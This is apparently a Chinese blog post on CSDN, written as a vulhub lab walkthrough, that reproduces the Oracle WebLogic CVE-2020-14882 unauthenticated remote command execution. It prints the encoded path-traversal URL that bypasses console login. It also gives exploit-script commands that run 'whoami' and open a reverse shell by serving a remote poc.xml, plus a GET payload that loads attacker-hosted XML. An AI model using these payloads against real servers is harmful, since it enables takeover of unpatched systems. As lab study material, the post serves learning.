Weblogic CVE-2020-14882 未授权远程命令执行漏洞

已于 2023-04-22 21:38:17 修改
阅读量595 收藏 4
点赞数
文章标签: web安全 服务器
于 2023-02-25 12:52:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64297700/article/details/129213473
版权

CVE-2020-14882

漏洞简介

Oracle WebLogic Server 未授权远程命令执行漏洞

原理

  • 未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码

环境搭建

  • 这边也特意出了一篇vulhub环境搭建,还不太会环境搭建的小伙伴可以看这里哟;

漏洞复现

  • 访问your-IP:7001,页面出现404说明环境搭建成功;

在这里插入图片描述- 继续访问your-IP:7001/console,出现一个登录页面;

在这里插入图片描述

  • 由于不知道用户名和密码无法进入后台,但这里可以利用绕过验证漏洞,可以绕过登录;

      your-IP:端口/console/images/%252E%252E%252Fconsole.portal

在这里插入图片描述
访问成功进入了后台, 但这里后台权限过低无法执行其他操作;

利用方式一

python3 CVE-2020-14882_ALL.py -u http://your-IP:7001 -c "whoami"

在这里插入图片描述

  • 修改漏洞利用工具里的poc.xml,将IP和监听端口修改为自己的;

在这里插入图片描述

  • 开启服务端http服务,默认是8000端口,使其可以访问到poc.xml;(注:命令执行目录)
python3 -m http.server

在这里插入图片描述

  • 宿主机访问your-IP:8000/poc.xml,成功访问;

在这里插入图片描述

  • 服务端也成功返回状态;

在这里插入图片描述

  • 新开一个窗口,监听poc.xml监听端口,这里以1234为例;

在这里插入图片描述

  • 再新开一个窗口,进入到漏洞利用工具目录下,执行反弹shell命令,成功反弹shell;
python3 CVE-2020-14882_ALL.py -u http://your-IP:7001 -x http://your-IP:8000/poc.xml

在这里插入图片描述

利用方式二 (未成功)

  • 看其他大佬的方法,尝试在浏览器使用get请求也可反弹shell;

Payload

http://your-IP:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://your-IP/poc.xml")

在这里插入图片描述

  • 但是尝试了几次都失败了,我也不知道啥子原因,如果有成功的大佬也希望可以交流一下,我学习学习;

在这里插入图片描述
以上内容就是Oracle WebLogic Server 未授权远程命令执行漏洞复现过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

橘猫的饼干798
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-14882 weblogic授权远程命令执行漏洞
栉风沐雪的博客
02-22 4059
Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC 被公开,经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
CVE-2023-21839】Vulhub Weblogic授权远程代码执行漏洞复现
qq_43175881的博客
09-26 272
CVE-2023-21839 漏洞复现过程
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)
最新发布
weixin_45653478的博客
05-14 566
Weblogic Pre-Auth Remote Command Execution 漏洞CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令
[Java安全]—weblogic常见漏洞
Sentiment的博客
07-11 3431
本来想跟一些T3反序列化的,奈何本地环境怎么都起不起来先复现一下常见漏洞吧。。。Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和 数据库应用的Java应用服务器。Vulhub - Docker-Compose file for vulnerability environment 启动环境后访问,进入后台弱口令直接登录weblogic常用弱口令: htt
CVE-2020-14882&14883 Weblogic 管理控制台授权远程命令执行漏洞复现
ierciyuan的博客
07-30 931
CVE-2020-14882&14883Weblogic管理控制台授权远程命令执行漏洞复现。提供相关软件包(网盘)
Weblogic常见漏洞详解
m0_64481831的博客
03-01 2545
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被提到频率还蛮高的。这篇文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、授权访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 ...通过该漏洞,攻击者可以在授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以实现远程代码执行获取目标服务器的权限。
CVE-2020-14882 WebLogic远程代码执行漏洞测试环境搭建
m0_63558213的博客
09-01 1707
CVE-2020-14882 WebLogic远程代码执行漏洞测试环境搭建,远程攻击者可以构造特殊的HTTP请求,在经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Console 执行任意代码。
Web漏洞-授权访问漏洞
Ays.Ie的博客
03-21 3508
该篇记录了web漏洞-授权访问漏洞的相关知识
Weblogic授权访问漏洞-CVE-2020-14882&&CVE-2020-14883
weixin_51151498的博客
12-05 1544
weblogic漏洞复现
Weblogic授权访问以及LADP远程代码执行CVE-2021-2109)
hackzkaq的博客
05-14 1463
1.影响版本: WebLogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 实验环境: 攻击机:kalilinux 10.1.1.10 靶机: 10.1.1.109 2.weblogic授权访问: 对目标地址的7001端口直接访问 构造绕过授权url: ip:7001/console/css/%252e%252e%252f/consolejndi.portal 其中%252e%25
Weblogic管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)
xhscxj的博客
10-21 632
启动环境访问登录页面此时我们不知道密码burp抓包修改访问后台后,可以发现我们现在是低权限的用户,无法安装应用,所以也无法直接执行任意代码此时需要利用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种,一是通过,二是通过。直接访问如下URL,即可利用这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在类。是一种更为通杀的方法,最早在CVE-2019-2725被提出,对于所有Weblogic版本均有效。
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)漏洞复现
weixin_70045024的博客
09-18 1590
Weblogic
WebLogic授权命令执行漏洞(CVE-2020-14882-14883)
m0_48520508的博客
11-10 8234
0x00简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 Weblogic对比Tomcat 0x01漏洞概述 CVE-2020-14882: 代码执行漏洞 远程攻击者可以构造特殊的HTTP请求,在经身份
CVE-2020-14882漏洞修复
07-28
根据引用\[1\]中提到的Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update),其中包含了修复CVE-2020-14882漏洞的补丁。这个漏洞存在于Weblogic Console中,攻击者可以通过构造特殊的HTTP GET请求,在受影响的WebLogic Server上执行任意代码。因此,为了修复CVE-2020-14882漏洞,您需要安装Oracle发布的最新关键补丁更新。这样可以确保您的系统不再受到该漏洞的影响。 #### 引用[.reference_title] - *1* [CVE-2020-14882weblogic 授权命令执行漏洞验证及修复](https://blog.csdn.net/weixin_38896449/article/details/110480656)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Weblogic Console远程代码执行漏洞(CVE-2020-14882)](https://blog.csdn.net/weixin_42181573/article/details/117526222)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值